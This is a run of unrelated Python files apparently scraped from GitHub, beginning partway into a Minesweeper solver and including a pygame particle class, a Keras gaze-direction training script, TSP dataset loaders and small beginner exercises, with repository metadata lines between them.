print("adjacents",adjacent.row, adjacent.column ) item_possibilities = square_possibilities(item) print(item_possibilities, item.row, item.column) for i in range(len(keys)): for k in range(len(item_adjacents)): if keys[i] == item_adjacents[k]: big_overlap_indexes.append(i) small_overlap_indexes.append(k) #Finds which squares overlap big_overlap_possibilities = make_new_bin(big_overlap_indexes, board_possibilities) print(big_overlap_possibilities, "big overlap possibilities") small_overlap_possibilities = make_new_bin(small_overlap_indexes, item_possibilities) print(small_overlap_possibilities, "small """) overlap_possibilities = small_overlap_possibilities for bin in overlap_possibilities: if bin not in big_overlap_possibilities: overlap_possibilities.remove(bin) board_possibilities = check_in_list(board_possibilities, big_overlap_indexes, overlap_possibilities) item_possibilities = check_in_list(item_possibilities, small_overlap_indexes, overlap_possibilities) pygame.event.get() stripped_item_possibilities = [] for bin in item_possibilities: new_bin = "" for i in range(len(bin)): if i not in small_overlap_indexes: new_bin += bin[i] if new_bin not in stripped_item_possibilities: stripped_item_possibilities.append(new_bin) stripped_item_keys = [] pygame.event.get() for i in range(len(item_adjacents)): if i not in small_overlap_indexes: stripped_item_keys.append(item_adjacents[i]) new_board_possibilities = [] for bin in board_possibilities: for item_bin in stripped_item_possibilities: potential_mines = 0 new_bin = bin + item_bin check_bin = item_bin for i in range(len(big_overlap_indexes)): check_bin = check_bin[:small_overlap_indexes[i]] + bin[big_overlap_indexes[i]] + check_bin[small_overlap_indexes[i]:] if check_bin in item_possibilities: for character in new_bin: if character == "1": potential_mines += 1 if num_flags + potential_mines <= mine_count: new_board_possibilities.append(new_bin) #Check if there will be too many mines on the board # 
print(board_possibilities) # print(big_overlap_indexes) # print(item_possibilities) # print(small_overlap_indexes) board_possibilities = new_board_possibilities # print(new_board_possibilities) keys += stripped_item_keys # for key in keys: # print("keys", key.row, key.column) pygame.event.get() print(board_possibilities) for i in range(len(board_possibilities[0])): small_success = True number = board_possibilities[0][i] for q in range(1, len(board_possibilities)): if number != board_possibilities[q][i]: small_success = False break if small_success: big_success = True print("big_success") if number == "0": keys[i].reveal() elif number == "1": keys[i].flag = True wait() if big_success: for key in keys: print(key.row, key.column, "key") break if not big_success: random_num = rand(0, len(keys)-1) keys[random_num].reveal() print(keys[random_num].row, keys[random_num].column, "random selection") wait() print("random") game("c")
OOCam1/Minesweeper
Minesweeper.py
Minesweeper.py
py
19,511
python
en
code
0
github-code
36
8111739008
import pygame, sys from pygame.locals import * class Particle(object): #Initalizes the paritcle object (called when it is first created) def __init__(self,X,Y,size,deltaX,deltaY,color, displaySurface): #surface to display the particle on self.displaySurface = displaySurface #color to make the particle self.color = color #how fast it moves on the X axis self.deltaX = deltaX #how far it moves on the Y axis self.deltaY = deltaY #create the particle rectangle self.rectangle = pygame.Rect(X,Y, size , size) #function to draw the particle image on the displaysurface def draw(self): #draw the particle pygame.draw.rect(self.displaySurface, self.color, self.rectangle) #move the particle so it is in a #new location next time we draw self.rectangle.x = self.rectangle.x + self.deltaX self.rectangle.y = self.rectangle.y + self.deltaY def setColor(self,color): #color to make the particle self.color = color
arnavdani/Python-2015-Summer
MyClasses/Particle.py
Particle.py
py
1,136
python
en
code
0
github-code
36
18672969440
import pandas as pd import argparse import yaml import os import io import json def retrieve_params(config): with open(config) as yaml_file: params= yaml.safe_load(yaml_file) return params def generate_metadata_csv(params): excel_file_path = params["data"]["standard_excel_file"] df = pd.read_csv(excel_file_path) df.columns = [i.strip() for i in df.columns] buffer = io.StringIO() df.info(buf=buffer, verbose = True, null_counts = False, memory_usage=False) s = buffer.getvalue() s = s.split("\n") del(s[1]) s = "\n".join(s) standard_csv_meta = params["data"]["standard_csv_meta"] with open(standard_csv_meta, "a+") as f: f.write(s) f.write("\n") def generate_metadata_json(params): json_file_path = params["data"]["standard_json_file"] with open(json_file_path) as json_file: standard_dict = json.load(json_file) standard_json_meta = params["data"]["standard_json_meta"] keys1 = standard_dict.keys() for i in standard_dict["items"]: keys2 = i.keys() break b = standard_dict["items"][0]["snippet"] keys3 = b.keys() with open(standard_json_meta, "w") as meta: meta.write(str(list(keys1))) meta.write("\n") meta.write(str(list(keys2))) meta.write("\n") meta.write(str(list(keys3))) def generate_metadata(config): params = retrieve_params(config=config) generate_metadata_csv(params) generate_metadata_json(params) if __name__=="__main__": args = argparse.ArgumentParser() args.add_argument("--config", default="params.yaml") parsed_args = args.parse_args() generate_metadata(parsed_args.config)
sagar-harry/Youtube_Trending_data
generate_meta_data_file_2.py
generate_meta_data_file_2.py
py
1,708
python
en
code
0
github-code
36
24340406630
""" Variables! """ length = 20 breadth = 10 area = length * breadth print(area) # legal variables Area = 10 _area = 10 _Area = 10 area_1 = 10 area1 = 10 # python should use snake-case naming first_name = 'Akhila' print(first_name) #python basic: programming challenge: Money left in the bank after subracting all the items from bank_amount bank_amount = 100 item_one = 25 item_two = 30 item_three = 15 bank_amount = bank_amount - (item_one+item_two+item_three) print(bank_amount)
AkhilaSirikonda/Python-Project
PythonBasics/variables.py
variables.py
py
489
python
en
code
0
github-code
36
25978420324
from enum import Enum class ProxyResponseType(Enum): proxy = 'proxy' file = 'file' json = 'json' def get_dict(self): return self.value class ProxyResponse(object): def __init__(self, request, response, type: ProxyResponseType, status_code: int, headers: dict, body: any): self.request = request self.response = response self.type = type self.status_code = status_code self.headers = headers self.body = body def get_dict(self): return { 'type': self.type.value, 'status_code': self.status_code, 'headers': self.headers, 'body': self.body, }
sayler8182/MockServer
app/models/models/proxy_response.py
proxy_response.py
py
793
python
en
code
2
github-code
36
29317958483
from keras.utils.data_utils import get_file import os import numpy as np from os import listdir from os.path import isfile, join, isdir import cv2 from random import shuffle import math from keras.callbacks import TensorBoard, EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, LearningRateScheduler from keras.models import Model from keras import optimizers import tensorflow as tf from keras import backend as K from keras.layers import Input, BatchNormalization, Activation, Dropout, Embedding, LSTM, Dense, Conv2D, MaxPooling2D, TimeDistributed, Flatten, concatenate, Reshape, Lambda from keras.applications.vgg16 import VGG16 import scipy.ndimage as ndimage import operator from keras.applications.vgg16 import preprocess_input # annot_path='/home/lfan/Dropbox/JointAttention/Data/annotation/' # # train_path='/home/lfan/Dropbox/JointAttention/faces/train_union/' # train_sf=[f for f in listdir(train_path) if isdir(join(train_path,f))] # validate_path='/home/lfan/Dropbox/JointAttention/faces/validate_union/' # validate_sf=[f for f in listdir(validate_path) if isdir(join(validate_path,f))] # test_path='/home/lfan/Dropbox/runCoAtt/rawData/images/separate/test/' # test_sf=[f for f in listdir(test_path) if isdir(join(test_path,f))] # # vid_set=test_sf #train_sf # # annot_sf=[join(annot_path,f) for f in listdir(annot_path) if isdir(join(annot_path,f))] # # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_new.txt','w') as F: # for i in range(len(vid_set)): # sf = annot_path+vid_set[i] # vid = vid_set[i] # # with open(join(sf, 'coattention.txt'), 'r') as r1: # lines = r1.readlines() # for j in range(0,len(lines),10): # list_now = lines[j].split() # frame_now = str(int(list_now[1])+1) # img_name = '/home/lfan/Dropbox/runCoAtt/rawData/images/all/' + frame_now.zfill(5) + '_' + vid + '.jpg' # # ca_xmin=float(list_now[2]) # ca_ymin=float(list_now[3]) # ca_xmax=float(list_now[4]) # ca_ymax=float(list_now[5]) # ca_x=(ca_xmin+ca_xmax)/2 # ca_y=(ca_ymin+ca_ymax)/2 # # # 
num_face = (len(list_now) - 2) / 4 - 1 # for k in range(num_face): # face = list_now[(6 + k * 4):(10 + k * 4)] # xmin=float(face[0]) # ymin=float(face[1]) # xmax=float(face[2]) # ymax=float(face[3]) # face_x=(xmin+xmax)/2 # face_y=(ymin+ymax)/2 # # dir_x=ca_x-face_x # dir_y=ca_y-face_y # L=math.sqrt(dir_x ** 2 + dir_y ** 2) # dir_x=dir_x/L # dir_y=dir_y/L # # # if dir_y >= 0: # # direction = math.acos(dir_x / math.sqrt(dir_x ** 2 + dir_y ** 2)) # # elif dir_y < 0: # # direction = 2*math.pi - math.acos(dir_x / math.sqrt(dir_x ** 2 + dir_y ** 2)) # # F.write(img_name+' '+str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+str(dir_x)+' '+str(dir_y)+'\n') # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train.txt','r') as f: # lines=f.readlines() # # for i in range(len(lines)): # list=lines[i].split() # if not isfile(list[0]): # # print(list[0]) # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train.txt','r') as f: # lines=f.readlines() # # dir_hist=np.zeros(shape=(10,1)) # for i in range(len(lines)): # list=lines[i].split() # # dir=int(float(list[5])//(2*math.pi/10)) # if dir==10: # dir=0 # dir_hist[dir,0]+=1 # # print(dir_hist) # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_new.txt','r') as f: # lines=f.readlines() # with open('/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_flipped_new.txt','w') as f2: # for i in range(len(lines)): # list = lines[i].split() # xmin=float(list[1]) # xmax=float(list[3]) # # xmax_n=480-xmin # xmin_n=480-xmax # # dir_x=float(list[5]) # dir_y=float(list[6]) # # dir_x=-dir_x # # if dir<0.5*(2*math.pi): # # dir_n=0.5-dir # # else: # # dir_n=1.5*(2*math.pi)-dir # # f2.write(list[0]+' '+str(xmin_n)+' '+list[2]+' '+str(xmax_n)+' '+list[4]+' '+str(dir_x)+' '+str(dir_y)+' '+'f\n') # gfdatapath='/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/' # # with open('/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test.txt','r') as f: # lines=f.readlines() # with 
open('/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test_flipped.txt','w') as f2: # for i in range(len(lines)): # list = lines[i].split() # img=cv2.imread(join(gfdatapath,list[0])) # h, w, ch = img.shape # # xmin=float(list[1]) # xmax=float(list[3])+float(list[1]) # # xmax_n=w-xmin # xmin_n=w-xmax # w_n=xmax_n-xmin_n # # dir=float(list[9]) # if dir<0.5: # dir_n=0.5-dir # else: # dir_n=1.5-dir # # f2.write(list[0]+' '+str(xmin_n)+' '+list[2]+' '+str(w_n)+' '+list[4]+' '+list[5]+' '+list[6]+' '+list[7]+' '+list[8]+' '+str(dir_n)+' '+'f\n') batch_size=25 epochs=25 nb_train_samples=12000 # 13706 nb_validate_samples=6000 #8533 nb_test_samples=6000 model_weights_path = '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/gazedir_finalweights.hdf5' model_path = '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/gazedir_finalmodel.h5' tensorboard_log_dir = '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/tb_log/' gfdatapath='/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/' def mygenerator(mode): if mode==1: file_name='/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train_new.txt' #file_name_flip='/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_train_flipped.txt' #file_name_gazefollow='/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_train.txt' #file_name_gazefollow_flipped = '/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_train_flipped.txt' sample_len=nb_train_samples elif mode==2: file_name = '/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_validate_new.txt' #file_name_flip = '/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_validate_flipped.txt' #file_name_gazefollow = '/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test.txt' #file_name_gazefollow_flipped = '/home/lfan/Dropbox/runCoAtt/vgg16/gazefollow_data/annotation_test_flipped.txt' sample_len=nb_validate_samples with open(file_name,'r') as reader: lines=reader.readlines() # with open(file_name_flip,'r') as reader: # lines_flipped=reader.readlines() # 
with open(file_name_gazefollow,'r') as reader: # lines_gazefollow=reader.readlines() # with open(file_name_gazefollow_flipped,'r') as reader: # lines_gazefollow_flipped=reader.readlines() lines=lines[0:sample_len] #lines_flipped=lines_flipped[0:sample_len] #lines[0:0]=lines_flipped # lines[0:0]=lines_gazefollow # lines[0:0]=lines_gazefollow_flipped #lines=lines[0:sample_len] shuffle(lines) shuffle(lines) cur_batch_index=0 while True: x_batch = np.zeros(shape=(batch_size, 224, 224, 3)) y_batch = np.zeros(shape=(batch_size, 2)) start_id = cur_batch_index * batch_size end_id = start_id + batch_size files_batch_now = lines[start_id:end_id] for j in range(batch_size): list_now=files_batch_now[j].split() if len(list_now)<8: img = cv2.imread(list_now[0]) # if len(list_now) == 7: # img = cv2.flip(img, 1) # cv2.imshow('flipped',img) # cv2.waitKey(0) # cv2.destroyAllWindows() xmin = int(float(list_now[1]))# - (float(list_now[3]) - float(list_now[1])) * 0) ymin = int(float(list_now[2]))# - (float(list_now[4]) - float(list_now[2])) * 0) xmax = int(float(list_now[3]))# + (float(list_now[3]) - float(list_now[1])) * 0) ymax = int(float(list_now[4]) )#+ (float(list_now[4]) - float(list_now[2])) * 0) # w = float(xmax - xmin) # h = float(ymax - ymin) # wh_list = [w, h] # max_index, max_value = max(enumerate(wh_list), key=operator.itemgetter(1)) # pad = (wh_list[max_index] - wh_list[1 - max_index]) / 2 # if max_index == 0: # ymin = ymin - pad # ymax = ymax + pad # elif max_index == 1: # xmin -= pad # xmax += pad xmin = int(max(0, xmin)) ymin = int(max(0, ymin)) xmax = max(xmin + 1, xmax) ymax = max(ymin + 1, ymax) xmax = int(min(479, xmax)) ymax = int(min(319, ymax)) #direction = float(list_now[5]) / (2 * math.pi) dir_x=float(list_now[5]) dir_y=float(list_now[6]) # print(img.shape) face = img[ymin:ymax, xmin:xmax, :] face = cv2.resize(face, (224, 224)) #face=face.astype('float32') # face[:, :, 0] -= 123.68 # face[:, :, 1] -= 116.779 # face[:, :, 2] -= 103.939 #face=(face/255)*2-1 
#print(direction) #cv2.putText(face, str(direction), (10, 500), cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 2, cv2.LINE_AA) # cv2.imshow('face',face) # cv2.waitKey(0) # cv2.destroyAllWindows() x_batch[j, :, :, :] = face y_batch[j, 0] = dir_x y_batch[j, 1] = dir_y elif len(list_now)>9: name = list_now[0] bbox_x = int(float(list_now[1])) bbox_y = int(float(list_now[2])) bbox_w = int(float(list_now[3])) bbox_h = int(float(list_now[4])) eye_x = int(np.float32(list_now[5])) eye_y = int(np.float32(list_now[6])) direction = np.float32(list_now[9]) img = cv2.imread(gfdatapath + name) if len(list_now)==11: img = cv2.flip(img, 1) h, w, ch = img.shape totop = np.abs(eye_y - bbox_y) if int(totop) == 0: totop = 10 face_h = int(2* totop) face_w = int(2 * totop) face_x = int(eye_x - totop) face_y = int(eye_y - totop) if face_x < bbox_x: face_x = bbox_x if face_y < bbox_y: face_y = bbox_y if (face_x + face_w) > (bbox_x + bbox_w): face_w = bbox_x + bbox_w - face_x if (face_y + face_h) > (bbox_y + bbox_h): face_h = bbox_y + bbox_h - face_y if face_x < 0: face_x = 0 if face_y < 0: face_y = 0 face_w=max(1,face_w) face_h=max(1,face_h) if (face_x + face_w) > w: face_w = w - face_x if (face_y + face_h) > h: face_h = h - face_y face_pro = img[face_y:(face_y + face_h), face_x:(face_x + face_w), :] face_pro = cv2.resize(face_pro, (224, 224)) face_pro=face_pro.astype('float32') # face_pro[:, :, 0] -= 103.939 # face_pro[:, :, 1] -= 116.779 # face_pro[:, :, 2] -= 123.68 face_pro = np.float32(face_pro) / 255 #direction = direction / (math.pi * 2) x_batch[j,:,:,:] = face_pro y_batch[j,0] = direction # cv2.imshow(str(direction),x_batch[j,:,:,:]) # cv2.waitKey(0) # cv2.destroyAllWindows() yield x_batch, y_batch cur_batch_index = cur_batch_index + 1 if cur_batch_index >= (len(lines) // batch_size): cur_batch_index = 0 shuffle(lines) # def myloss(y_true,y_pred): lamb=0.9 loss=lamb*tf.reduce_sum(tf.square(y_true-y_pred)) sess=tf.Session() sess.run(loss) 
#+(1-lamb)*tf.abs(1-tf.reduce_sum(tf.square(y_pred))) #loss= (1 - tf.matmul(y_true,y_pred,transpose_b=True)/tf.sqrt(tf.reduce_sum(tf.square(y_true))*tf.reduce_sum(tf.square(y_pred)))) #+ tf.abs(1-tf.reduce_sum(tf.square(y_pred))) # offset=np.abs(y_true-y_pred) # loss=2*((0.5-np.abs(offset-0.5))**2) return loss def lr_decay(epoch): initial_lr = 1e-3 drop = 0.8 epochs_drop = 2 lr = initial_lr * math.pow(drop, math.floor(epoch / epochs_drop)) return lr def train_model(): img_input = Input(shape=(224, 224, 3), name='img_input') # Block 1 x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1')(img_input) x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x) x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x) base_output = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) 
base_model=Model(inputs=img_input,outputs=base_output) base_model.trainable=True WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5' weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5', WEIGHTS_PATH_NO_TOP, cache_subdir='models') base_model.load_weights(weights_path) output = Flatten(name='flatten')(base_output) output = Dense(4096, kernel_initializer='normal',activation='relu',name='fc1')(output) output = Dropout(0.5)(output) output = Dense(4096, kernel_initializer='normal',name='fc2')(output) output=BatchNormalization()(output) output=Activation('relu')(output) output = Dropout(0.5)(output) predict= Dense(2, kernel_initializer='normal',activation='tanh', name='predict')(output) # Create your own model mymodel = Model(inputs=img_input, outputs=predict) mymodel.summary() mycallback = [] tbCallback = TensorBoard(log_dir=tensorboard_log_dir, histogram_freq=0, batch_size=batch_size, write_graph=True, write_images=True) lrscheduler = LearningRateScheduler(lr_decay) model_checkpoint = ModelCheckpoint( '/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/checkpoint.weights.{epoch:02d}-{val_loss:.2f}.hdf5', save_best_only=False, save_weights_only=True, monitor='val_loss') mycallback.append(tbCallback) mycallback.append(model_checkpoint) mycallback.append(lrscheduler) #sgd = optimizers.SGD(lr=1e-4) mymodel.compile(optimizer='sgd', loss='mse', metrics=['mae','acc']) history = mymodel.fit_generator(mygenerator(1), steps_per_epoch=(2*nb_train_samples) // batch_size, epochs=epochs, validation_data=mygenerator(2), validation_steps=(2*nb_validate_samples) // batch_size, callbacks=mycallback) mymodel.save_weights(model_weights_path) mymodel.save(model_path) score = mymodel.evaluate_generator(mygenerator(2), (2*nb_validate_samples) // batch_size) print("Validation Accuracy= ", score[1]) def testmodel(): # img_input = Input(shape=(224, 224, 3), name='img_input') # # 
# Block 1 # x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1')(img_input) # x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # # # Block 2 # x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x) # x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # # # Block 3 # x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x) # x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x) # x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # # # Block 4 # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x) # x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # # # Block 5 # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x) # x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x) # base_output = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) # # output = Flatten(name='flatten')(base_output) # output = Dense(1024, activation='tanh', name='fc1')(output) # output = Dropout(0.5)(output) # output = Dense(512, activation='tanh', name='fc2')(output) # output = Dropout(0.5)(output) # output = Dense(128, activation='tanh', name='fc3')(output) # output = Dropout(0.5)(output) # predict = Dense(2, activation='tanh', name='predict')(output) img_input = Input(shape=(224, 224, 3), name='img_input') # Block 1 x = Conv2D(64, (3, 
3), activation='relu', padding='same', name='block1_conv1')(img_input) x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x) x = Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x) x = Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x) x = Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x) base_output = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) output = Flatten(name='flatten')(base_output) output = Dense(4096, kernel_initializer='normal', activation='relu', name='fc1')(output) output = Dropout(0.5)(output) output = Dense(4096, kernel_initializer='normal', name='fc2')(output) output = BatchNormalization()(output) output = Activation('relu')(output) output = Dropout(0.5)(output) predict = Dense(2, kernel_initializer='normal', activation='tanh', name='predict')(output) # Create your own model mymodel = Model(inputs=img_input, outputs=predict) mymodel.summary() 
mymodel.load_weights('/home/lfan/Dropbox/runCoAtt/new_experiment/gazedir/checkpoint.weights.19-0.47.hdf5') file_name='/home/lfan/Dropbox/runCoAtt/rawData/gaze_summary_test_new.txt' sample_len=nb_test_samples with open(file_name,'r') as reader: lines=reader.readlines() lines=lines[0:sample_len] shuffle(lines) LOSS=0 cnt=0 for j in range(sample_len): list_now = lines[j].split() img = cv2.imread(list_now[0]) xmin = int(float(list_now[1])) # - (float(list_now[3]) - float(list_now[1])) * 0) ymin = int(float(list_now[2])) # - (float(list_now[4]) - float(list_now[2])) * 0) xmax = int(float(list_now[3])) # + (float(list_now[3]) - float(list_now[1])) * 0) ymax = int(float(list_now[4])) # + (float(list_now[4]) - float(list_now[2])) * 0) xmin = max(0, xmin) ymin = max(0, ymin) xmax = max(xmin + 1, xmax) ymax = max(ymin + 1, ymax) xmax = min(479, xmax) ymax = min(319, ymax) dir_x=float(list_now[5]) dir_y=float(list_now[6]) #direction = float(list_now[5]) / (2 * math.pi) # print(img.shape) face = img[ymin:ymax, xmin:xmax, :] face = cv2.resize(face, (224, 224)) #face = face.astype('float32') #face=face[:,:,::-1] # face[:, :, 0] -= 123.68 # face[:, :, 1] -= 116.779 # face[:, :, 2] -= 103.939 #face=face/255 # print(direction) # cv2.putText(face, str(direction), (10, 500), cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 2, cv2.LINE_AA) x_batch=np.zeros(shape=(1,224,224,3)) x_batch[0,:,:,:]=face res=mymodel.predict(x_batch,batch_size=1) res=res[0] print(res) print('GT: '+str(dir_x)+' '+str(dir_y)) o_x=112 o_y=112 cv2.arrowedLine(face,(o_x,o_y),(o_x+int(res[0]*100),o_y+int(res[1]*100)),(0,0,255),5) cv2.arrowedLine(face, (o_x, o_y), (o_x + int(dir_x*100), o_y + int(dir_y*100)), (0, 255, 255), 5) cv2.imshow('face',face) cv2.waitKey(0) cv2.destroyAllWindows() LOSS+=((dir_x-res[0])**2+(dir_y-res[1])**2)/2 cnt+=1 # cv2.imshow(str(res[0])+' '+str(res[1]), face) # cv2.waitKey(0) # cv2.destroyAllWindows() print('Average loss: {}'.format(LOSS/cnt)) #train_model() testmodel()
LifengFan/Shared-Attention
src/gazemap.py
gazemap.py
py
23,892
python
en
code
4
github-code
36
69941827626
import pickle import os import numpy as np import torch from sklearn.datasets import make_blobs from torch.utils.data import Dataset from torch.utils.data.dataset import T_co def prepare_blob_dataset(city_num: int = 50, feature_dim: int = 2, sample_num: int = 100000 ) -> (np.ndarray, np.ndarray): samples = np.zeros((sample_num, city_num, feature_dim)) labels = np.zeros((sample_num, city_num)) for sample in range(sample_num): samples[sample, :, :], labels[sample, :] = make_blobs(city_num, feature_dim, cluster_std=0.07, center_box=(0.0, 1.0)) return samples, labels class BlobDataset(Dataset): def __init__(self, city_num: int = 50, feature_dim: int = 2, sample_num: int = 100000): super(BlobDataset, self).__init__() self.city_num = city_num self.feature_dim = feature_dim self.sample_num = sample_num self.samples, self.labels = self._generate_dataset() def __getitem__(self, index) -> T_co: sample = self.samples[index] label = self.labels[index] data_pair = {'sample': sample, 'label': label} return data_pair def __len__(self): return len(self.samples) def _generate_dataset(self): samples, labels = prepare_blob_dataset(self.city_num, self.feature_dim, self.sample_num) return torch.from_numpy(samples).float(), torch.from_numpy(labels) # TSP dataset wrapper from https://github.com/wouterkool/attention-learn-to-route class TSPDataset(Dataset): def __init__(self, filename=None, size=20, num_samples=1000000, offset=0, distribution=None): super(TSPDataset, self).__init__() self.data_set = [] if filename is not None: if os.path.splitext(filename)[1] == '.npy': data = np.load(filename) assert data.ndim == (2 or 3), "data.ndim should either be 2 or 3" if data.ndim == 2: data = np.expand_dims(data, axis=0) self.data = [torch.FloatTensor(row) for row in (data[offset:offset + num_samples])] else: assert os.path.splitext(filename)[1] == '.pkl' with open(filename, 'rb') as f: data = pickle.load(f) self.data = [torch.FloatTensor(row) for row in (data[offset:offset + num_samples])] else: 
# Sample points randomly in [0, 1] square self.data = [torch.FloatTensor(size, 2).uniform_(0, 1) for _ in range(num_samples)] self.size = len(self.data) def __len__(self): return self.size def __getitem__(self, idx): return self.data[idx] def data_normalisation(self): self.data = [(self.data[row] - self.data[row].min()) / (self.data[row].max() - self.data[row].min()) for row in range(self.size)] if __name__ == '__main__': test = TSPDataset(filename='tmp/platforms.npy') test2 = TSPDataset(size=20, num_samples=50) print(len(test))
ma-shangao/rl_waypoint_mrta
dataset_preparation.py
dataset_preparation.py
py
3,367
python
en
code
2
github-code
36
22107437691
from blackfox import BlackFox, KerasOptimizationConfig import csv blackfox_url = 'http://localhost:50476/' bf = BlackFox(blackfox_url) input_columns = 9 input_set = [] output_set = [] with open('data/cancer_training_set.csv') as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 for row in csv_reader: if line_count == 0: print(f'Column names are {", ".join(row)}') else: data = list(map(float, row)) input_set.append(data[:input_columns]) output_set.append(data[input_columns:]) line_count += 1 print(f'Processed {line_count} lines.') c = KerasOptimizationConfig(validation_split=0.2) # Use CTRL + C to stop optimization (ann_io, ann_info, ann_metadata) = bf.optimize_keras_sync( input_set, output_set, config=c, network_path='data/optimized_network_cancer.onnx', network_type='onnx', integrate_scaler=True ) print('\n\nann info:') print(ann_info) print('\n\nann metadata:') print(ann_metadata)
vodena/BlackFoxPython
examples/test_optimize_sync_onnx.py
test_optimize_sync_onnx.py
py
1,040
python
en
code
1
github-code
36
2360976211
""" 【问题描述】 编写一函数insert(string, c),用于在一个已排好序(ASCII值从小到大)的字符串string(少于50个字符)中适当位置插入字符c,要求插入后串的序不变(从小到大),允许字符重复,函数返回插入后的字符串。 测试该函数:从键盘分别输入有序字符串和单个字符,然后调用insert函数,并向屏幕输出插入后的字符串。 【输入形式】 从键盘分行输入有序字符串和单个字符 【输出形式】 向屏幕输出插入后的字符串 【输入样例】 abdef c 【输出样例】 abcdef 【样例说明】 从键盘输入少于50个字符的有序字符串abdef和字符c,将字符c插入字符串abdef,并以ASCII值从小到大排序输出 """ def insert(string, c): flag = string + c result = sorted(flag) return result words = input().strip() word = input().strip() words_list = insert(words, word) for i in words_list: print(i, end = "")
xzl995/Python
